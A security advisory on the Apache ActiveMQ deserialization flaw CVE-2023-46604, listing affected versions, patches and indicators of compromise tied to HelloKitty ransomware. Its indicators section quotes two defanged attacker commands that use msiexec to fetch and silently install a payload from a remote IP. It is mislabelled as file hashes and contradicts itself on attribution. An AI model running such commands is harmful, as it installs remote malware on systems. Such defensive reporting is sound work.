Get in Touch
Indiscriminate, opportunistic targeting.
Intelligence indicates that a recently disclosed Apache ActiveMQ vulnerability, tracked as CVE-2023-46604 (CVSSv3.1 score: 10.0), has been exploited by HelloKitty ransomware operators. The assessment has been made based on the contents of the ransom note and the technical analysis of the associated malware source code.
On 2nd November 2023, CVE-2023-46604 was added to the Cybersecurity & Infrastructure Security Agency (CISA) Known Exploited Vulnerability (KEV) Catalog.
It has been assessed that successful exploitation of CVE-2023-46604 would almost certainly result in threat actors gaining remote code execution capabilities on target systems.
Apache has released a security update regarding the affected product versions. As such, previous versions are vulnerable to potential exploitation.
CVE-2023-46604 affects the following Apache ActiveMQ versions:
Apache ActiveMQ 5.18.0 before 5.18.3
Apache ActiveMQ 5.17.0 before 5.17.6
Apache ActiveMQ 5.16.0 before 5.16.7
Apache ActiveMQ before 5.15.16
Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
Containment, Mitigations & Remediations
It is strongly recommended that users of the affected product versions apply the released Apache security update. A remediation was addressed in ActiveMQ versions 5.15.16, 5.16.7, 5.17.6, or 5.18.3 released late last month.
Indicators of Compromise
File Hash Indicators (SHA-256):
cmd.exe /c “start msiexec /q /i hxxp://172.245.16[.]125/m4.png”
cmd.exe /c “start msiexec /q /i hxxp://172.245.16[.]125/m2.png”
Apache ActiveMQ occupies a significant portion of the enterprise application integration market share. The related products are used extensively by organisations across the industry sector spectrum. Within this context, it has been assessed that cyber threat actors will almost certainly view organisations with operational protocols involving these products as prime targets as they seek to meet their pre-defined objectives.
Due to CVE-2023-46604 having already been subjected to malicious cyber operations, it is of critical importance to follow the recommended remediation strategies to reduce the risk of exploitation.
No attribution to specific threat actors or groups has been identified at the time of writing.
Common Weakness Enumeration (CWE):
CWE-502– Deserialization of Untrusted Data